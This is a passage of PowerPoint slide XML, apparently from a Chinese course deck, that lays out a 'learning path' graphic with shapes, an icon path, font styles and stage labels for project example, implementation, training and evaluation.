                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实例</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11344" y="6929"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13895" y="6880"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目训练</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16233" y="2830"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl5pPr>
              <a:lvl6pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl6pPr>
              <a:lvl7pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl7pPr>
              <a:lvl8pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl8pPr>
              <a:lvl9pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
